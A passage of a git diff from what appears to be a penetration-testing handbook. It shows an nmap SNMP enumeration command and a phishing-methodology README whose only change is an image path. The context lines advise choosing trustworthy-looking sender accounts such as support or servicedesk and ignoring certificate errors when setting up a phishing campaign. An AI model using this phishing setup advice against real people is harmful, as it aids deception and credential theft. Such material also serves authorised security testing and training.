 Description: Nmap snmp (no brute)
 Command: nmap --script "snmp* and not snmp-brute" {IP}
 ```
+

phishing-methodology/README.md

@@ -339,7 +339,7 @@ The page www.mail-tester.com can indicate you if you your domain is being blocke
 * Decide from which account are you going to send the phishing emails. Suggestions: _noreply, support, servicedesk, salesforce..._
 * You can leave blank the username and password, but make sure to check the Ignore Certificate Errors
 
-![](../.gitbook/assets/image%20%28253%29%20%281%29%20%282%29%20%281%29%20%281%29%20%282%29%20%282%29%20%283%29.png)
+![](../.gitbook/assets/image%20%28253%29%20%281%29%20%282%29%20%281%29%20%281%29%20%282%29%20%282%29%20%283%29%20%283%29.png)
 
 {% hint style="info" %}
 It's recommended to use the "**Send Test Email**" functionality to test that everything is working.